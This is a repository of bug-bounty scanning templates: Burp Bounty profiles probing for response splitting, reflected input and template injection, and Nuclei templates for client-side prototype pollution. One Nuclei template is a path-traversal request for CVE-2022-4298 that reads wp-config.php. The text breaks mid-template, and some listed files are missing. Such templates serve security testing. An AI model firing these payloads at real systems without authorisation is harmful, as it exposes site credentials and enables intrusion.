├── BurpBounty ├── BlindXSS_rs0n_Append_double-close.bb ├── BlindXSS_rs0n_Append_no-close.bb ├── BlindXSS_rs0n_Append_single-close.bb ├── BlindXSS_rs0n_Insert_double-close.bb ├── BlindXSS_rs0n_Insert_no-close.bb ├── BlindXSS_rs0n_Insert_single-close.bb ├── BlindXSS_rs0n_Replace_double-close.bb ├── BlindXSS_rs0n_Replace_no-close.bb ├── BlindXSS_rs0n_Replace_single-close.bb ├── HTTP_Response_Splitting.bb ├── ReflectedValue_rs0n_Append.bb ├── ReflectedValue_rs0n_Insert.bb ├── ReflectedValue_rs0n_Replace.bb ├── SSTI_rs0n_Append.bb ├── SSTI_rs0n_Insert.bb └── SSTI_rs0n_Replace.bb ├── Nuclei ├── CVE-2022-4298.yaml ├── MobileIron.yaml └── headless │ ├── cspp-bracket-firstparam.yaml │ ├── cspp-bracket.yaml │ ├── cspp-constructor-bracket-firstparam.yaml │ ├── cspp-constructor-bracket.yaml │ ├── cspp-constructor-dot-firstparam.yaml │ ├── cspp-constructor-dot.yaml │ ├── cspp-dot-firstparam.yaml │ └── cspp-dot.yaml └── README.md /BurpBounty/HTTP_Response_Splitting.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "Name": "HTTP_Response_Splitting", 4 | "Enabled": true, 5 | "Scanner": 1, 6 | "Author": "@Xer0Days", 7 | "Payloads": [ 8 | "INJECTX%0d%0aSet-Cookie:INJECTX123;%0d%0a", 9 | "INJECTX%0aSet-Cookie:INJECTX123;%0a", 10 | "INJECTX\\u{0120}HTTP/1.1\\u{010D}\\u{010A}Host:\\u{0120}crowdshield.com\\u{010D}\\u{010A}\\u{010D}\\u{010A}GET\\u{0120}/.injectx/r.php?http_split" 11 | ], 12 | "Encoder": [], 13 | "UrlEncode": false, 14 | "CharsToUrlEncode": "", 15 | "Grep": [ 16 | "true,Or,Set-Cookie: INJECTX123", 17 | "true,Or,Set-Cookie:INJECTX123" 18 | ], 19 | "Tags": [ 20 | "All" 21 | ], 22 | "PayloadResponse": false, 23 | "NotResponse": false, 24 | "TimeOut1": "", 25 | "TimeOut2": "", 26 | "isTime": false, 27 | "contentLength": "", 28 | "iscontentLength": false, 29 | "CaseSensitive": false, 30 | "ExcludeHTTP": false, 31 | "OnlyHTTP": true, 32 | "IsContentType": false, 33 | "ContentType": "", 34 | "HttpResponseCode": "", 35 | "NegativeCT": false, 36 | "IsResponseCode": false, 37 | "ResponseCode": "", 38 | "NegativeRC": false, 39 | "urlextension": "", 40 | "isurlextension": false, 41 | "NegativeUrlExtension": false, 42 | "MatchType": 1, 43 | "Scope": 0, 44 | "RedirType": 0, 45 | "MaxRedir": 0, 46 | "payloadPosition": 1, 47 | "payloadsFile": "", 48 | "grepsFile": "", 49 | "IssueName": "HTTP_Response_Splitting", 50 | "IssueSeverity": "Medium", 51 | "IssueConfidence": "Certain", 52 | "IssueDetail": "", 53 | "RemediationDetail": "", 54 | "IssueBackground": "", 55 | "RemediationBackground": "", 56 | "Header": [], 57 | "VariationAttributes": [], 58 | "InsertionPointType": [ 59 | 65, 60 | 36, 61 | 1, 62 | 6, 63 | 5, 64 | 64, 65 | 0, 66 | 3, 67 | 4 68 | ], 69 | "Scanas": false, 70 | "Scantype": 0, 71 | "pathDiscovery": false 72 | } 73 | ] -------------------------------------------------------------------------------- /BurpBounty/ReflectedValue_rs0n_Append.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "ReflectedValue_rs0n_Append", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,rs0n\"\u003e" 10 | ], 11 | "Encoder": [], 12 | "UrlEncode": false, 13 | "CharsToUrlEncode": "", 14 | "Grep": [ 15 | "true,,rs0n\"\u003e" 16 | ], 17 | "Tags": [ 18 | "All" 19 | ], 20 | "PayloadResponse": false, 21 | "NotResponse": false, 22 | "TimeOut1": "", 23 | "TimeOut2": "", 24 | "isTime": false, 25 | "contentLength": "", 26 | "iscontentLength": false, 27 | "CaseSensitive": false, 28 | "ExcludeHTTP": true, 29 | "OnlyHTTP": false, 30 | "IsContentType": false, 31 | "ContentType": "", 32 | "HttpResponseCode": "", 33 | "NegativeCT": false, 34 | "IsResponseCode": false, 35 | "ResponseCode": "", 36 | "NegativeRC": false, 37 | "urlextension": "", 38 | "isurlextension": false, 39 | "NegativeUrlExtension": false, 40 | "MatchType": 1, 41 | "Scope": 0, 42 | "RedirType": 4, 43 | "MaxRedir": 0, 44 | "payloadPosition": 2, 45 | "payloadsFile": "", 46 | "grepsFile": "", 47 | "IssueName": "Reflected Value", 48 | "IssueSeverity": "Information", 49 | "IssueConfidence": "Certain", 50 | "IssueDetail": "User-controlled input is being reflected in the server\u0027s response.", 51 | "RemediationDetail": "", 52 | "IssueBackground": "", 53 | "RemediationBackground": "", 54 | "Header": [], 55 | "VariationAttributes": [], 56 | "InsertionPointType": [ 57 | 18, 58 | 65, 59 | 32, 60 | 36, 61 | 7, 62 | 1, 63 | 2, 64 | 6, 65 | 33, 66 | 5, 67 | 35, 68 | 34, 69 | 64, 70 | 0, 71 | 3, 72 | 4, 73 | 37, 74 | 127, 75 | 65, 76 | 32, 77 | 36, 78 | 7, 79 | 1, 80 | 2, 81 | 6, 82 | 33, 83 | 5, 84 | 35, 85 | 34, 86 | 64, 87 | 0, 88 | 3, 89 | 4, 90 | 37, 91 | 127 92 | ], 93 | "Scanas": false, 94 | "Scantype": 0, 95 | "pathDiscovery": false 96 | } 97 | ] -------------------------------------------------------------------------------- /BurpBounty/ReflectedValue_rs0n_Insert.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "ReflectedValue_rs0n_Insert", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,rs0n\"\u003e" 10 | ], 11 | "Encoder": [], 12 | "UrlEncode": false, 13 | "CharsToUrlEncode": "", 14 | "Grep": [ 15 | "true,,rs0n\"\u003e" 16 | ], 17 | "Tags": [ 18 | "All" 19 | ], 20 | "PayloadResponse": false, 21 | "NotResponse": false, 22 | "TimeOut1": "", 23 | "TimeOut2": "", 24 | "isTime": false, 25 | "contentLength": "", 26 | "iscontentLength": false, 27 | "CaseSensitive": false, 28 | "ExcludeHTTP": true, 29 | "OnlyHTTP": false, 30 | "IsContentType": false, 31 | "ContentType": "", 32 | "HttpResponseCode": "", 33 | "NegativeCT": false, 34 | "IsResponseCode": false, 35 | "ResponseCode": "", 36 | "NegativeRC": false, 37 | "urlextension": "", 38 | "isurlextension": false, 39 | "NegativeUrlExtension": false, 40 | "MatchType": 1, 41 | "Scope": 0, 42 | "RedirType": 4, 43 | "MaxRedir": 0, 44 | "payloadPosition": 3, 45 | "payloadsFile": "", 46 | "grepsFile": "", 47 | "IssueName": "Reflected Value", 48 | "IssueSeverity": "Information", 49 | "IssueConfidence": "Certain", 50 | "IssueDetail": "User-controlled input is being reflected in the server\u0027s response.", 51 | "RemediationDetail": "", 52 | "IssueBackground": "", 53 | "RemediationBackground": "", 54 | "Header": [], 55 | "VariationAttributes": [], 56 | "InsertionPointType": [ 57 | 18, 58 | 65, 59 | 32, 60 | 36, 61 | 7, 62 | 1, 63 | 2, 64 | 6, 65 | 33, 66 | 5, 67 | 35, 68 | 34, 69 | 64, 70 | 0, 71 | 3, 72 | 4, 73 | 37, 74 | 127, 75 | 65, 76 | 32, 77 | 36, 78 | 7, 79 | 1, 80 | 2, 81 | 6, 82 | 33, 83 | 5, 84 | 35, 85 | 34, 86 | 64, 87 | 0, 88 | 3, 89 | 4, 90 | 37, 91 | 127 92 | ], 93 | "Scanas": false, 94 | "Scantype": 0, 95 | "pathDiscovery": false 96 | } 97 | ] -------------------------------------------------------------------------------- /BurpBounty/ReflectedValue_rs0n_Replace.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "ReflectedValue_rs0n_Replace", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,rs0n\"\u003e" 10 | ], 11 | "Encoder": [], 12 | "UrlEncode": false, 13 | "CharsToUrlEncode": "", 14 | "Grep": [ 15 | "true,,rs0n\"\u003e" 16 | ], 17 | "Tags": [ 18 | "All" 19 | ], 20 | "PayloadResponse": false, 21 | "NotResponse": false, 22 | "TimeOut1": "", 23 | "TimeOut2": "", 24 | "isTime": false, 25 | "contentLength": "", 26 | "iscontentLength": false, 27 | "CaseSensitive": false, 28 | "ExcludeHTTP": true, 29 | "OnlyHTTP": false, 30 | "IsContentType": false, 31 | "ContentType": "", 32 | "HttpResponseCode": "", 33 | "NegativeCT": false, 34 | "IsResponseCode": false, 35 | "ResponseCode": "", 36 | "NegativeRC": false, 37 | "urlextension": "", 38 | "isurlextension": false, 39 | "NegativeUrlExtension": false, 40 | "MatchType": 1, 41 | "Scope": 0, 42 | "RedirType": 4, 43 | "MaxRedir": 0, 44 | "payloadPosition": 1, 45 | "payloadsFile": "", 46 | "grepsFile": "", 47 | "IssueName": "Reflected Value", 48 | "IssueSeverity": "Information", 49 | "IssueConfidence": "Certain", 50 | "IssueDetail": "User-controlled input is being reflected in the server\u0027s response.", 51 | "RemediationDetail": "", 52 | "IssueBackground": "", 53 | "RemediationBackground": "", 54 | "Header": [], 55 | "VariationAttributes": [], 56 | "InsertionPointType": [ 57 | 18, 58 | 65, 59 | 32, 60 | 36, 61 | 7, 62 | 1, 63 | 2, 64 | 6, 65 | 33, 66 | 5, 67 | 35, 68 | 34, 69 | 64, 70 | 0, 71 | 3, 72 | 4, 73 | 37, 74 | 127, 75 | 65, 76 | 32, 77 | 36, 78 | 7, 79 | 1, 80 | 2, 81 | 6, 82 | 33, 83 | 5, 84 | 35, 85 | 34, 86 | 64, 87 | 0, 88 | 3, 89 | 4, 90 | 37, 91 | 127 92 | ], 93 | "Scanas": false, 94 | "Scantype": 0, 95 | "pathDiscovery": false 96 | } 97 | ] -------------------------------------------------------------------------------- /BurpBounty/SSTI_rs0n_Append.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "SSTI_rs0n_Append", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,{{349*349}}", 10 | "true,${349*349}", 11 | "true,\u003c%\u003d 349*349 %\u003e", 12 | "true,${{349*349}}", 13 | "true,#{349*349}" 14 | ], 15 | "Encoder": [], 16 | "UrlEncode": false, 17 | "CharsToUrlEncode": "", 18 | "Grep": [ 19 | "true,,121801" 20 | ], 21 | "Tags": [ 22 | "All" 23 | ], 24 | "PayloadResponse": false, 25 | "NotResponse": false, 26 | "TimeOut1": "", 27 | "TimeOut2": "", 28 | "isTime": false, 29 | "contentLength": "", 30 | "iscontentLength": false, 31 | "CaseSensitive": false, 32 | "ExcludeHTTP": false, 33 | "OnlyHTTP": false, 34 | "IsContentType": false, 35 | "ContentType": "", 36 | "HttpResponseCode": "", 37 | "NegativeCT": false, 38 | "IsResponseCode": false, 39 | "ResponseCode": "", 40 | "NegativeRC": false, 41 | "urlextension": "", 42 | "isurlextension": false, 43 | "NegativeUrlExtension": false, 44 | "MatchType": 1, 45 | "Scope": 0, 46 | "RedirType": 0, 47 | "MaxRedir": 0, 48 | "payloadPosition": 2, 49 | "payloadsFile": "", 50 | "grepsFile": "", 51 | "IssueName": "Server-Side Template Injection (SSTI)", 52 | "IssueSeverity": "High", 53 | "IssueConfidence": "Firm", 54 | "IssueDetail": "A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.\n\nTemplate engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.\n\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", 55 | "RemediationDetail": "", 56 | "IssueBackground": "", 57 | "RemediationBackground": "", 58 | "Header": [], 59 | "VariationAttributes": [], 60 | "InsertionPointType": [ 61 | 18, 62 | 65, 63 | 32, 64 | 36, 65 | 7, 66 | 1, 67 | 2, 68 | 6, 69 | 33, 70 | 5, 71 | 35, 72 | 34, 73 | 64, 74 | 0, 75 | 3, 76 | 4, 77 | 37, 78 | 127, 79 | 65, 80 | 32, 81 | 36, 82 | 7, 83 | 1, 84 | 2, 85 | 6, 86 | 33, 87 | 5, 88 | 35, 89 | 34, 90 | 64, 91 | 0, 92 | 3, 93 | 4, 94 | 37, 95 | 127 96 | ], 97 | "Scanas": false, 98 | "Scantype": 0, 99 | "pathDiscovery": false 100 | } 101 | ] -------------------------------------------------------------------------------- /BurpBounty/SSTI_rs0n_Insert.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "SSTI_rs0n_Insert", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,{{349*349}}", 10 | "true,${349*349}", 11 | "true,\u003c%\u003d 349*349 %\u003e", 12 | "true,${{349*349}}", 13 | "true,#{349*349}" 14 | ], 15 | "Encoder": [], 16 | "UrlEncode": false, 17 | "CharsToUrlEncode": "", 18 | "Grep": [ 19 | "true,,121801" 20 | ], 21 | "Tags": [ 22 | "All" 23 | ], 24 | "PayloadResponse": false, 25 | "NotResponse": false, 26 | "TimeOut1": "", 27 | "TimeOut2": "", 28 | "isTime": false, 29 | "contentLength": "", 30 | "iscontentLength": false, 31 | "CaseSensitive": false, 32 | "ExcludeHTTP": false, 33 | "OnlyHTTP": false, 34 | "IsContentType": false, 35 | "ContentType": "", 36 | "HttpResponseCode": "", 37 | "NegativeCT": false, 38 | "IsResponseCode": false, 39 | "ResponseCode": "", 40 | "NegativeRC": false, 41 | "urlextension": "", 42 | "isurlextension": false, 43 | "NegativeUrlExtension": false, 44 | "MatchType": 1, 45 | "Scope": 0, 46 | "RedirType": 0, 47 | "MaxRedir": 0, 48 | "payloadPosition": 1, 49 | "payloadsFile": "", 50 | "grepsFile": "", 51 | "IssueName": "Server-Side Template Injection (SSTI)", 52 | "IssueSeverity": "High", 53 | "IssueConfidence": "Firm", 54 | "IssueDetail": "A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.\n\nTemplate engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.\n\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", 55 | "RemediationDetail": "", 56 | "IssueBackground": "", 57 | "RemediationBackground": "", 58 | "Header": [], 59 | "VariationAttributes": [], 60 | "InsertionPointType": [ 61 | 18, 62 | 65, 63 | 32, 64 | 36, 65 | 7, 66 | 1, 67 | 2, 68 | 6, 69 | 33, 70 | 5, 71 | 35, 72 | 34, 73 | 64, 74 | 0, 75 | 3, 76 | 4, 77 | 37, 78 | 127, 79 | 65, 80 | 32, 81 | 36, 82 | 7, 83 | 1, 84 | 2, 85 | 6, 86 | 33, 87 | 5, 88 | 35, 89 | 34, 90 | 64, 91 | 0, 92 | 3, 93 | 4, 94 | 37, 95 | 127 96 | ], 97 | "Scanas": false, 98 | "Scantype": 0, 99 | "pathDiscovery": false 100 | } 101 | ] -------------------------------------------------------------------------------- /BurpBounty/SSTI_rs0n_Replace.bb: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "ProfileName": "SSTI_rs0n_Replace", 4 | "Name": "", 5 | "Enabled": true, 6 | "Scanner": 1, 7 | "Author": "rs0n", 8 | "Payloads": [ 9 | "true,{{349*349}}", 10 | "true,${349*349}", 11 | "true,\u003c%\u003d 349*349 %\u003e", 12 | "true,${{349*349}}", 13 | "true,#{349*349}" 14 | ], 15 | "Encoder": [], 16 | "UrlEncode": false, 17 | "CharsToUrlEncode": "", 18 | "Grep": [ 19 | "true,,121801" 20 | ], 21 | "Tags": [ 22 | "All" 23 | ], 24 | "PayloadResponse": false, 25 | "NotResponse": false, 26 | "TimeOut1": "", 27 | "TimeOut2": "", 28 | "isTime": false, 29 | "contentLength": "", 30 | "iscontentLength": false, 31 | "CaseSensitive": false, 32 | "ExcludeHTTP": false, 33 | "OnlyHTTP": false, 34 | "IsContentType": false, 35 | "ContentType": "", 36 | "HttpResponseCode": "", 37 | "NegativeCT": false, 38 | "IsResponseCode": false, 39 | "ResponseCode": "", 40 | "NegativeRC": false, 41 | "urlextension": "", 42 | "isurlextension": false, 43 | "NegativeUrlExtension": false, 44 | "MatchType": 1, 45 | "Scope": 0, 46 | "RedirType": 0, 47 | "MaxRedir": 0, 48 | "payloadPosition": 1, 49 | "payloadsFile": "", 50 | "grepsFile": "", 51 | "IssueName": "Server-Side Template Injection (SSTI)", 52 | "IssueSeverity": "High", 53 | "IssueConfidence": "Firm", 54 | "IssueDetail": "A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.\n\nTemplate engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server.\n\nhttps://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", 55 | "RemediationDetail": "", 56 | "IssueBackground": "", 57 | "RemediationBackground": "", 58 | "Header": [], 59 | "VariationAttributes": [], 60 | "InsertionPointType": [ 61 | 18, 62 | 65, 63 | 32, 64 | 36, 65 | 7, 66 | 1, 67 | 2, 68 | 6, 69 | 33, 70 | 5, 71 | 35, 72 | 34, 73 | 64, 74 | 0, 75 | 3, 76 | 4, 77 | 37, 78 | 127, 79 | 65, 80 | 32, 81 | 36, 82 | 7, 83 | 1, 84 | 2, 85 | 6, 86 | 33, 87 | 5, 88 | 35, 89 | 34, 90 | 64, 91 | 0, 92 | 3, 93 | 4, 94 | 37, 95 | 127 96 | ], 97 | "Scanas": false, 98 | "Scantype": 0, 99 | "pathDiscovery": false 100 | } 101 | ] -------------------------------------------------------------------------------- /Nuclei/CVE-2022-4298.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-4298 2 | 3 | info: 4 | name: Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download 5 | author: rs0n 6 | severity: critical 7 | description: | 8 | The Wholesale Market WordPress plugin before 2.2.1 does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server. 9 | reference: 10 | - https://wpscan.com/vulnerability/7485ad23-6ea4-4018-88b1-174312a0a478 11 | classification: 12 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 13 | cvss-score: 10 14 | cve-id: CVE-2022-4298 15 | cwe-id: CWE-22 16 | metadata: 17 | verified: "true" 18 | tags: directory-traversal,wholesale-market,wpscan,cve,cve2022,whole,wordpress,wp-plugin,wp 19 | 20 | requests: 21 | - raw: 22 | - | 23 | GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv HTTP/1.1 24 | Host: {{Hostname}} 25 | - | 26 | @timeout: 10s 27 | GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1 28 | Host: {{Hostname}} 29 | matchers-condition: and 30 | matchers: 31 | - type: dsl 32 | dsl: 33 | - "len(body)>2 && status_code==200" 34 | 35 | - type: word 36 | words: 37 | - " { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-bracket.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-bracket 2 | 3 | info: 4 | name: Prototype Pollution Check Using Bracket Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&__proto__[rs0n]=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&__proto__[rs0n]=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-bracket-firstparam.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-bracket-constructor-firstparam 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}?constructor[prototype][rs0n]=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}?constructor[prototype][rs0n]=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-bracket.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-bracket-constructor 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&constructor[prototype][rs0n]=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&constructor[prototype][rs0n]=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-dot-firstparam.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot-constructor-firstparam 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}?constructor.prototype.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}?constructor.prototype.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-constructor-dot.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot-constructor 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&constructor.prototype.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&constructor.prototype.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-dot-firstparam.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot-firstparam 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}?__proto__.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}?__proto__.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /Nuclei/headless/cspp-dot.yaml: -------------------------------------------------------------------------------- 1 | id: client-side-prototype-pollution-dot 2 | 3 | info: 4 | name: Prototype Pollution Check Using Dot Notation 5 | author: rs0n 6 | severity: medium 7 | description: | 8 | Client-Side Prototype Pollution was detected -- PAYLOAD: {{BaseURL}}&__proto__.rs0n=rs0n 9 | reference: 10 | - https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution 11 | - https://portswigger.net/web-security/prototype-pollution 12 | - https://www.youtube.com/watch?v=guPuPblLPI8 13 | - https://github.com/R-s0n/Green-Energy 14 | tags: headless, prototype-pollution 15 | 16 | headless: 17 | - steps: 18 | - action: navigate 19 | args: 20 | url: "{{BaseURL}}&__proto__.rs0n=rs0n" 21 | - action: waitload 22 | 23 | - action: script 24 | name: pollution-check 25 | args: 26 | code: | 27 | () => { document.body.innerHTML = rs0n } 28 | 29 | matchers: 30 | - type: word 31 | part: resp 32 | words: 33 | - "rs0n" -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Custom vulnerability scanning templates 2 | 3 | Remember to replace my xss-hunter url with your own, otherwise I'll steal your bounty ;) 4 | --------------------------------------------------------------------------------